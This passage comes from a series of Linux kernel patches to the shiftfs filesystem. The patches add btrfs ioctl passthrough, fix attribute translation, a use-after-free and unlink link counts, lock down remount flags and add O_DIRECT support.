++	if (!ret)
++		ret = err;
++
+ 	return ret;
+ }
+ 
++static bool in_ioctl_whitelist(int flag)
++{
++	switch (flag) {
++	case BTRFS_IOC_SNAP_CREATE:
++		return true;
++	case BTRFS_IOC_SNAP_CREATE_V2:
++		return true;
++	case BTRFS_IOC_SUBVOL_CREATE:
++		return true;
++	case BTRFS_IOC_SUBVOL_CREATE_V2:
++		return true;
++	case BTRFS_IOC_SNAP_DESTROY:
++		return true;
++	}
++
++	return false;
++}
++
+ static long shiftfs_ioctl(struct file *file, unsigned int cmd,
+ 			  unsigned long arg)
+ {
+@@ -1386,7 +1528,9 @@ static long shiftfs_ioctl(struct file *file, unsigned int cmd,
+ 	case FS_IOC_SETFLAGS:
+ 		break;
+ 	default:
+-		return -ENOTTY;
++		if (!in_ioctl_whitelist(cmd) ||
++		    !shiftfs_passthrough_ioctls(file->f_path.dentry->d_sb->s_fs_info))
++			return -ENOTTY;
+ 	}
+ 
+ 	return shiftfs_real_ioctl(file, cmd, arg);
+@@ -1403,7 +1547,9 @@ static long shiftfs_compat_ioctl(struct file *file, unsigned int cmd,
+ 	case FS_IOC32_SETFLAGS:
+ 		break;
+ 	default:
+-		return -ENOIOCTLCMD;
++		if (!in_ioctl_whitelist(cmd) ||
++		    !shiftfs_passthrough_ioctls(file->f_path.dentry->d_sb->s_fs_info))
++			return -ENOIOCTLCMD;
+ 	}
+ 
+ 	return shiftfs_real_ioctl(file, cmd, arg);
+-- 
+2.39.2
+
+From 7e64c9484f2524943cde1164852c1888312c010f Mon Sep 17 00:00:00 2001
+From: Seth Forshee <seth.forshee@canonical.com>
+Date: Thu, 11 Apr 2019 07:31:04 -0500
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: use translated ids when chaning lower
+ fs attrs
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1824350
+
+shiftfs_setattr() is preparing a new set of attributes with the
+owner translated for the lower fs, but it then passes the
+original attrs. As a result the owner is set to the untranslated
+owner, which causes the shiftfs inodes to also have incorrect
+ids. For example:
+
+ # mkdir dir
+ # touch file
+ # ls -lh dir file
+ drwxr-xr-x 2 root root 4.0K Apr 11 13:05 dir
+ -rw-r--r-- 1 root root 0 Apr 11 13:05 file
+ # chown 500:500 dir file
+ # ls -lh dir file
+ drwxr-xr-x 2 1000500 1000500 4.0K Apr 11 12:42 dir
+ -rw-r--r-- 1 1000500 1000500 0 Apr 11 12:42 file
+
+Fix this to pass the correct iattr struct to notify_change().
+
+Reviewed-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Thadeu Lima de Souza Cascardo <cascardo@canonical.com>
+Acked-by: Tyler Hicks <tyhicks@canonical.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 678cad30f4a5..e736fd6afcb4 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -779,7 +779,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
+ 
+ 	inode_lock(loweri);
+ 	oldcred = shiftfs_override_creds(dentry->d_sb);
+-	err = notify_change(lowerd, attr, NULL);
++	err = notify_change(lowerd, &newattr, NULL);
+ 	revert_creds(oldcred);
+ 	inode_unlock(loweri);
+ 
+-- 
+2.39.2
+
+From 84e09374dce45b2aaec7e719acd209b1e5e4ae85 Mon Sep 17 00:00:00 2001
+From: Seth Forshee <seth.forshee@canonical.com>
+Date: Sat, 13 Apr 2019 14:41:01 -0500
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix passing of attrs to underaly for
+ setattr
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1824717
+
+shiftfs_setattr() makes a copy of the attrs it was passed to pass
+to the lower fs. It then calls setattr_prepare() with the original
+attrs, and this may make changes which are not reflected in the
+attrs passed to the lower fs. To fix this, copy the attrs to the
+new struct for the lower fs after calling setattr_prepare().
+
+Additionally, notify_change() may have set ATTR_MODE when one of
+ATTR_KILL_S[UG]ID is set, and passing this combination to
+notify_change() will trigger a BUG(). Do as overlayfs and
+ecryptfs both do, and clear ATTR_MODE if either of those bits
+is set.
+
+Reviewed-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Marcelo Henrique Cerri <marcelo.cerri@canonical.com>
+Acked-by: Brad Figg <brad.figg@canonical.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 10 +++++++++-
+ 1 file changed, 9 insertions(+), 1 deletion(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index e736fd6afcb4..8e064756ea0c 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -765,7 +765,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
+ {
+ 	struct dentry *lowerd = dentry->d_fsdata;
+ 	struct inode *loweri = lowerd->d_inode;
+-	struct iattr newattr = *attr;
++	struct iattr newattr;
+ 	const struct cred *oldcred;
+ 	struct super_block *sb = dentry->d_sb;
+ 	int err;
+@@ -774,9 +774,17 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
+ 	if (err)
+ 		return err;
+ 
++	newattr = *attr;
+ 	newattr.ia_uid = KUIDT_INIT(from_kuid(sb->s_user_ns, attr->ia_uid));
+ 	newattr.ia_gid = KGIDT_INIT(from_kgid(sb->s_user_ns, attr->ia_gid));
+ 
++	/*
++	 * mode change is for clearing setuid/setgid bits. Allow lower fs
++	 * to interpret this in its own way.
++	 */
++	if (newattr.ia_valid & (ATTR_KILL_SUID|ATTR_KILL_SGID))
++		newattr.ia_valid &= ~ATTR_MODE;
++
+ 	inode_lock(loweri);
+ 	oldcred = shiftfs_override_creds(dentry->d_sb);
+ 	err = notify_change(lowerd, &newattr, NULL);
+-- 
+2.39.2
+
+From a3ba10b3019139566fa65c351966ca3482c90819 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian@brauner.io>
+Date: Mon, 15 Apr 2019 15:21:55 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: prevent use-after-free when verifying
+ mount options
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1824735
+
+Copy up the passthrough mount settings of the mark mount point to the
+shiftfs overlay.
+
+Before this commit we used to keep a reference to the shiftfs mark
+mount's shiftfs_super_info which was stashed in the superblock of the
+mark mount. The problem is that we only take a reference to the mount of
+the underlay, i.e. the filesystem that is *under* the shiftfs mark
+mount. This means when someone performs a shiftfs mark mount, then a
+shiftfs overlay mount and then immediately unmounts the shiftfs mark
+mount we muck with invalid memory since shiftfs_put_super might have
+already been called freeing that memory.
+
+Another solution would be to start reference counting. But this would be
+overkill. We only care about the passthrough mount option of the mark
+mount. And we only need it to verify that on remount the new passthrough
+options of the shiftfs overlay are a subset of the mark mount's
+passthrough options. In other scenarios we don't care. So copying up is
+good enough and also only needs to happen once on mount, i.e. when a new
+superblock is created and the .fill_super method is called.
+
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Seth Forshee <seth.forshee@canonical.com>
+Acked-by: Stefan Bader <stefan.bader@canonical.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 29 ++++++++++++++++++-----------
+ 1 file changed, 18 insertions(+), 11 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 8e064756ea0c..4c8a6ec2a617 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -28,7 +28,7 @@ struct shiftfs_super_info {
+ 	const struct cred *creator_cred;
+ 	bool mark;
+ 	unsigned int passthrough;
+-	struct shiftfs_super_info *info_mark;
++	unsigned int passthrough_mark;
+ };
+ 
+ struct shiftfs_file_info {
+@@ -52,10 +52,6 @@ static inline bool shiftfs_passthrough_ioctls(struct shiftfs_super_info *info)
+ 	if (!(info->passthrough & SHIFTFS_PASSTHROUGH_IOCTL))
+ 		return false;
+ 
+-	if (info->info_mark &&
+-	    !(info->info_mark->passthrough & SHIFTFS_PASSTHROUGH_IOCTL))
+-		return false;
+-
+ 	return true;
+ }
+ 
+@@ -64,10 +60,6 @@ static inline bool shiftfs_passthrough_statfs(struct shiftfs_super_info *info)
+ 	if (!(info->passthrough & SHIFTFS_PASSTHROUGH_STAT))
+ 		return false;
+ 
+-	if (info->info_mark &&
+-	    !(info->info_mark->passthrough & SHIFTFS_PASSTHROUGH_STAT))
+-		return false;
+-
+ 	return true;
+ }
+ 
+@@ -1824,7 +1816,7 @@ static int shiftfs_remount(struct super_block *sb, int *flags, char *data)
+ 
+ 	if (info->passthrough != new.passthrough) {
+ 		/* Don't allow exceeding passthrough options of mark mount. */
+-		if (!passthrough_is_subset(info->info_mark->passthrough,
++		if (!passthrough_is_subset(info->passthrough_mark,
+ 					   info->passthrough))
+ 			return -EPERM;
+ 
+@@ -1926,9 +1918,19 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 
+ 			sbinfo->mnt = mntget(sbinfo_mp->mnt);
+ 			dentry = dget(path.dentry->d_fsdata);
++			/*
++			 * Copy up the passthrough mount options from the
++			 * parent mark mountpoint.
++			 */
++			sbinfo->passthrough_mark = sbinfo_mp->passthrough_mark;
+ 		} else {
+ 			sbinfo->mnt = mntget(path.mnt);
+ 			dentry = dget(path.dentry);
++			/*
++			 * For a new mark passthrough_mark and passthrough
++			 * are identical.
++			 */
++			sbinfo->passthrough_mark = sbinfo->passthrough;
+ 		}
+ 
+ 		sbinfo->creator_cred = prepare_creds();
+@@ -1956,7 +1958,12 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 		sbinfo->mnt = mntget(sbinfo_mp->mnt);
+ 		sbinfo->creator_cred = get_cred(sbinfo_mp->creator_cred);
+ 		dentry = dget(path.dentry->d_fsdata);
+-		sbinfo->info_mark = sbinfo_mp;
++		/*
++		 * Copy up passthrough settings from mark mountpoint so we can
++		 * verify when the overlay wants to remount with different
++		 * passthrough settings.
++		 */
++		sbinfo->passthrough_mark = sbinfo_mp->passthrough;
+ 	}
+ 
+ 	sb->s_stack_depth = dentry->d_sb->s_stack_depth + 1;
+-- 
+2.39.2
+
+From a6ec1bf679d71f552f3eee7bf2b5458a6ea71e9a Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian@brauner.io>
+Date: Tue, 16 Apr 2019 18:29:00 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: use separate llseek method for
+ directories
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1824812
+
+Give shiftfs it's own proper llseek method for directories.
+
+Before this commit we used to rely on an llseek method that was
+targeted for regular files for both directories and regular files.
+However, the realfile's f_pos was not correctly handled when userspace
+called lseek(2) on a shiftfs directory file. Give directories their
+own llseek operation so that seeking on a directory file is properly
+supported.
+
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Seth Forshee <seth.forshee@canonical.com>
+Acked-by: Tyler Hicks <tyhicks@canonical.com>
+Acked-by: Stefan Bader <stefan.bader@canonical.com>
+Signed-off-by: Kleber Sacilotto de Souza <kleber.souza@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 14 +++++++++++---
+ 1 file changed, 11 insertions(+), 3 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 4c8a6ec2a617..9771165d1ce0 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1144,7 +1144,15 @@ static int shiftfs_release(struct inode *inode, struct file *file)
+ 	return 0;
+ }
+ 
+-static loff_t shiftfs_llseek(struct file *file, loff_t offset, int whence)
++static loff_t shiftfs_dir_llseek(struct file *file, loff_t offset, int whence)
++{
++	struct shiftfs_file_info *file_info = file->private_data;
++	struct file *realfile = file_info->realfile;
++
++	return vfs_llseek(realfile, offset, whence);
++}
++
++static loff_t shiftfs_file_llseek(struct file *file, loff_t offset, int whence)
+ {
+ 	struct inode *realinode = file_inode(file)->i_private;
+ 
+@@ -1653,7 +1661,7 @@ static int shiftfs_iterate_shared(struct file *file, struct dir_context *ctx)
+ const struct file_operations shiftfs_file_operations = {
+ 	.open			= shiftfs_open,
+ 	.release		= shiftfs_release,
+-	.llseek			= shiftfs_llseek,
++	.llseek			= shiftfs_file_llseek,
+ 	.read_iter		= shiftfs_read_iter,
+ 	.write_iter		= shiftfs_write_iter,
+ 	.fsync			= shiftfs_fsync,
+@@ -1670,7 +1678,7 @@ const struct file_operations shiftfs_dir_operations = {
+ 	.compat_ioctl		= shiftfs_compat_ioctl,
+ 	.fsync			= shiftfs_fsync,
+ 	.iterate_shared		= shiftfs_iterate_shared,
+-	.llseek			= shiftfs_llseek,
++	.llseek			= shiftfs_dir_llseek,
+ 	.open			= shiftfs_open,
+ 	.read			= generic_read_dir,
+ 	.release		= shiftfs_release,
+-- 
+2.39.2
+
+From 10c6312a5c1cd2fbbbcb47adf7597e8cb2e18391 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian@brauner.io>
+Date: Wed, 8 May 2019 14:13:14 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: lock down certain superblock flags
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1827122
+
+This locks down various superblock flags to prevent userns-root from
+remounting a superblock with less restrictive options than the original
+mark or underlay mount.
+
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 47 ++++++++++++++++++++++++++++++++++++++++++++++-
+ 1 file changed, 46 insertions(+), 1 deletion(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 9771165d1ce0..a1dae7ea593b 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1808,6 +1808,33 @@ static inline bool passthrough_is_subset(int old_flags, int new_flags)
+ 	return true;
+ }
+ 
++static int shiftfs_super_check_flags(unsigned long old_flags,
++				     unsigned long new_flags)
++{
++	if ((old_flags & SB_RDONLY) && !(new_flags & SB_RDONLY))
++		return -EPERM;
++
++	if ((old_flags & SB_NOSUID) && !(new_flags & SB_NOSUID))
++		return -EPERM;
++
++	if ((old_flags & SB_NODEV) && !(new_flags & SB_NODEV))
++		return -EPERM;
++
++	if ((old_flags & SB_NOEXEC) && !(new_flags & SB_NOEXEC))
++		return -EPERM;
++
++	if ((old_flags & SB_NOATIME) && !(new_flags & SB_NOATIME))
++		return -EPERM;
++
++	if ((old_flags & SB_NODIRATIME) && !(new_flags & SB_NODIRATIME))
++		return -EPERM;
++
++	if (!(old_flags & SB_POSIXACL) && (new_flags & SB_POSIXACL))
++		return -EPERM;
++
++	return 0;
++}
++
+ static int shiftfs_remount(struct super_block *sb, int *flags, char *data)
+ {
+ 	int err;
+@@ -1818,6 +1845,10 @@ static int shiftfs_remount(struct super_block *sb, int *flags, char *data)
+ 	if (err)
+ 		return err;
+ 
++	err = shiftfs_super_check_flags(sb->s_flags, *flags);
++	if (err)
++		return err;
++
+ 	/* Mark mount option cannot be changed. */
+ 	if (info->mark || (info->mark != new.mark))
+ 		return -EPERM;
+@@ -1847,6 +1878,16 @@ struct shiftfs_data {
+ 	const char *path;
+ };
+ 
++static void shiftfs_super_force_flags(struct super_block *sb,
++				      unsigned long lower_flags)
++{
++	sb->s_flags |= lower_flags & (SB_RDONLY | SB_NOSUID | SB_NODEV |
++				      SB_NOEXEC | SB_NOATIME | SB_NODIRATIME);
++
++	if (!(lower_flags & SB_POSIXACL))
++		sb->s_flags &= ~SB_POSIXACL;
++}
++
+ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 			      int silent)
+ {
+@@ -1888,6 +1929,8 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 		goto out_put_path;
+ 	}
+ 
++	sb->s_flags |= SB_POSIXACL;
++
+ 	if (sbinfo->mark) {
+ 		struct super_block *lower_sb = path.mnt->mnt_sb;
+ 
+@@ -1904,6 +1947,8 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 		 */
+ 		sb->s_iflags = SB_I_NOEXEC;
+ 
++		shiftfs_super_force_flags(sb, lower_sb->s_flags);
++
+ 		/*
+ 		 * Handle nesting of shiftfs mounts by referring this mark
+ 		 * mount back to the original mark mount. This is more
+@@ -1972,6 +2017,7 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 		 * passthrough settings.
+ 		 */
+ 		sbinfo->passthrough_mark = sbinfo_mp->passthrough;
++		shiftfs_super_force_flags(sb, path.mnt->mnt_sb->s_flags);
+ 	}
+ 
+ 	sb->s_stack_depth = dentry->d_sb->s_stack_depth + 1;
+@@ -1995,7 +2041,6 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 	sb->s_op = &shiftfs_super_ops;
+ 	sb->s_xattr = shiftfs_xattr_handlers;
+ 	sb->s_d_op = &shiftfs_dentry_ops;
+-	sb->s_flags |= SB_POSIXACL;
+ 	sb->s_root = d_make_root(inode);
+ 	if (!sb->s_root) {
+ 		err = -ENOMEM;
+-- 
+2.39.2
+
+From 650ec55632c03c03e6cc5b08a764609b4b0eb192 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian@brauner.io>
+Date: Tue, 11 Jun 2019 11:47:35 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: allow changing ro/rw for subvolumes
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1832316
+
+This enables toggling between ro/rw for btrfs subvolumes under shiftfs.
+
+Currently, btrfs workloads employing shiftfs cause regression.
+With btrfs unprivileged users can already toggle whether a subvolume
+will be ro or rw. This is broken on current shiftfs as we haven't
+whitelisted these ioctls().
+To prevent such regression, we need to whitelist the ioctls
+BTRFS_IOC_FS_INFO, BTRFS_IOC_SUBVOL_GETFLAGS, and
+BTRFS_IOC_SUBVOL_SETFLAGS. All of them should be safe for unprivileged
+users.
+
+Cc: Seth Forshee <seth.forshee@canonical.com>
+Cc: Tyler Hicks <tyhicks@canonical.com>
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 21 ++++++++++++++++++---
+ 1 file changed, 18 insertions(+), 3 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index a1dae7ea593b..49f6714e9f95 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1507,9 +1507,14 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
+ 	return ret;
+ }
+ 
+-static bool in_ioctl_whitelist(int flag)
++static bool in_ioctl_whitelist(int flag, unsigned long arg)
+ {
++	void __user *argp = (void __user *)arg;
++	u64 flags = 0;
++
+ 	switch (flag) {
++	case BTRFS_IOC_FS_INFO:
++		return true;
+ 	case BTRFS_IOC_SNAP_CREATE:
+ 		return true;
+ 	case BTRFS_IOC_SNAP_CREATE_V2:
+@@ -1517,6 +1522,16 @@ static bool in_ioctl_whitelist(int flag)
+ 	case BTRFS_IOC_SUBVOL_CREATE:
+ 		return true;
+ 	case BTRFS_IOC_SUBVOL_CREATE_V2:
++		return true;
++	case BTRFS_IOC_SUBVOL_GETFLAGS:
++		return true;
++	case BTRFS_IOC_SUBVOL_SETFLAGS:
++		if (copy_from_user(&flags, arg, sizeof(flags)))
++			return false;
++
++		if (flags & ~BTRFS_SUBVOL_RDONLY)
++			return false;
++
+ 		return true;
+ 	case BTRFS_IOC_SNAP_DESTROY:
+ 		return true;
+@@ -1536,7 +1551,7 @@ static long shiftfs_ioctl(struct file *file, unsigned int cmd,
+ 	case FS_IOC_SETFLAGS:
+ 		break;
+ 	default:
+-		if (!in_ioctl_whitelist(cmd) ||
++		if (!in_ioctl_whitelist(cmd, arg) ||
+ 		    !shiftfs_passthrough_ioctls(file->f_path.dentry->d_sb->s_fs_info))
+ 			return -ENOTTY;
+ 	}
+@@ -1555,7 +1570,7 @@ static long shiftfs_compat_ioctl(struct file *file, unsigned int cmd,
+ 	case FS_IOC32_SETFLAGS:
+ 		break;
+ 	default:
+-		if (!in_ioctl_whitelist(cmd) ||
++		if (!in_ioctl_whitelist(cmd, arg) ||
+ 		    !shiftfs_passthrough_ioctls(file->f_path.dentry->d_sb->s_fs_info))
+ 			return -ENOIOCTLCMD;
+ 	}
+-- 
+2.39.2
+
+From cd66a65bbea66683404adadd7d61ec02d04ac21a Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian@brauner.io>
+Date: Fri, 19 Jul 2019 17:50:46 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: add O_DIRECT support
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1837223
+
+This enabled O_DIRECT support for shiftfs if the underlay supports it.
+
+Currently shiftfs does not handle O_DIRECT if the underlay supports it.
+This is blocking dqlite - an essential part of LXD - from profiting from
+the performance benefits of O_DIRECT on suitable filesystems when used
+with async io such as aio or io_uring.
+Overlayfs cannot support this directly since the upper filesystem in
+overlay can be any filesystem. So if the upper filesystem does not
+support O_DIRECT but the lower filesystem does you're out of luck.
+Shiftfs does not suffer from the same problem since there is not concept
+of an upper filesystem in the same way that overlayfs has it.
+Essentially, shiftfs is a transparent shim relaying everything to the
+underlay while overlayfs' upper layer is not (completely).
+
+Cc: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 3 +++
+ 1 file changed, 3 insertions(+)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 49f6714e9f95..addaa6e21e57 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1126,6 +1126,9 @@ static int shiftfs_open(struct inode *inode, struct file *file)
+ 	}
+ 
+ 	file->private_data = file_info;
++	/* For O_DIRECT dentry_open() checks f_mapping->a_ops->direct_IO. */
++	file->f_mapping = realfile->f_mapping;
++
+ 	file_info->realfile = realfile;
+ 	return 0;
+ }
+-- 
+2.39.2
+
+From 772a8ea3a85f0530a76bc8dbe4e91de92aa35180 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian@brauner.io>
+Date: Fri, 19 Jul 2019 17:50:47 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: pass correct point down
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1837231
+
+This used to pass an unsigned long to copy_from_user() instead of a
+void __user * pointer. This will produce warning with a sufficiently
+advanced compiler.
+
+Cc: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index addaa6e21e57..9006201c243d 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1529,7 +1529,7 @@ static bool in_ioctl_whitelist(int flag, unsigned long arg)
+ 	case BTRFS_IOC_SUBVOL_GETFLAGS:
+ 		return true;
+ 	case BTRFS_IOC_SUBVOL_SETFLAGS:
+-		if (copy_from_user(&flags, arg, sizeof(flags)))
++		if (copy_from_user(&flags, argp, sizeof(flags)))
+ 			return false;
+ 
+ 		if (flags & ~BTRFS_SUBVOL_RDONLY)
+-- 
+2.39.2
+
+From ca8b1596f4e2a5a3c8ee7b7cb45d4703b329c891 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian.brauner@ubuntu.com>
+Date: Thu, 29 Aug 2019 20:45:07 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix buggy unlink logic
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1841977
+
+The way we messed with setting i_nlink was brittle and wrong. We used to
+set the i_nlink of the shiftfs dentry to be deleted to the i_nlink count
+of the underlay dentry of the directory it resided in which makes no
+sense whatsoever. We also missed drop_nlink() which is crucial since
+i_nlink affects whether a dentry is cleaned up on dput().
+With this I cannot reproduce the bug anymore where shiftfs misleads zfs
+into believing that a deleted file can not be removed from disk because
+it is still referenced.
+
+Fixes: commit 87011da41961 ("shiftfs: rework and extend")
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 15 ++++++++++-----
+ 1 file changed, 10 insertions(+), 5 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 9006201c243d..e80db9480b5c 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -585,6 +585,7 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
+ {
+ 	struct dentry *lowerd = dentry->d_fsdata;
+ 	struct inode *loweri = dir->i_private;
++	struct inode *inode = d_inode(dentry);
+ 	int err;
+ 	const struct cred *oldcred;
+ 
+@@ -594,15 +595,19 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
+ 		err = vfs_rmdir(loweri, lowerd);
+ 	else
+ 		err = vfs_unlink(loweri, lowerd, NULL);
+-	inode_unlock(loweri);
+ 	revert_creds(oldcred);
+ 
+-	shiftfs_copyattr(loweri, dir);
+-	set_nlink(d_inode(dentry), loweri->i_nlink);
+-	if (!err)
++	if (!err) {
+ 		d_drop(dentry);
+ 
+-	set_nlink(dir, loweri->i_nlink);
++		if (rmdir)
++			clear_nlink(inode);
++		else
++			drop_nlink(inode);
++	}
++	inode_unlock(loweri);
++
++	shiftfs_copyattr(loweri, dir);
+ 
+ 	return err;
+ }
+-- 
+2.39.2
+
+From 81445d2871aef886eabb56c7f124d491f445fcc7 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian.brauner@ubuntu.com>
+Date: Fri, 30 Aug 2019 14:14:31 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: mark slab objects
+ SLAB_RECLAIM_ACCOUNT
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1842059
+
+Shiftfs does not mark it's slab cache as reclaimable. While this is not
+a big deal it is not nice to the kernel in general. The shiftfs cache is
+not so important that it can't be reclaimed.
+
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index e80db9480b5c..a21cb473e000 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -2108,7 +2108,7 @@ static int __init shiftfs_init(void)
+ {
+ 	shiftfs_file_info_cache = kmem_cache_create(
+ 		"shiftfs_file_info_cache", sizeof(struct shiftfs_file_info), 0,
+-		SLAB_HWCACHE_ALIGN | SLAB_ACCOUNT | SLAB_MEM_SPREAD, NULL);
++		SLAB_RECLAIM_ACCOUNT | SLAB_HWCACHE_ALIGN | SLAB_ACCOUNT | SLAB_MEM_SPREAD, NULL);
+ 	if (!shiftfs_file_info_cache)
+ 		return -ENOMEM;
+ 
+-- 
+2.39.2
+
+From 3d0e90c90e6b1b915b9ac760c865529b28cf1cdd Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian.brauner@ubuntu.com>
+Date: Wed, 2 Oct 2019 09:57:14 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: rework how shiftfs opens files
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1846265
+
+This commit simplifies how shiftfs open files, both regular files an
+directories.
+
+In the first iteration, we implemented a kmem cache for struct
+shiftfs_file_info which stashed away a struct path and the struct file
+for the underlay. The path however was never used anywhere so the struct
+shiftfs_file_info and therefore the whole kmem cache can go away.
+Instead we move to the same model as overlayfs and just stash away the
+struct file for the underlay in file->private_data of the shiftfs struct
+file.
+Addtionally, we split the .open method for files and directories.
+Similar to overlayfs .open for regular files uses open_with_fake_path()
+which ensures that it doesn't contribute to the open file count (since
+this would mean we'd count double). The .open method for directories
+however used dentry_open() which contributes to the open file count.
+
+The basic logic for opening files is unchanged. The main point is to
+ensure that a reference to the underlay's dentry is kept through struct
+path.
+
+Various bits and pieces of this were cooked up in discussions Seth and I
+had in Paris.
+
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 105 +++++++++++++++++++++++----------------------------
+ 1 file changed, 47 insertions(+), 58 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index a21cb473e000..55bb32b611f2 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
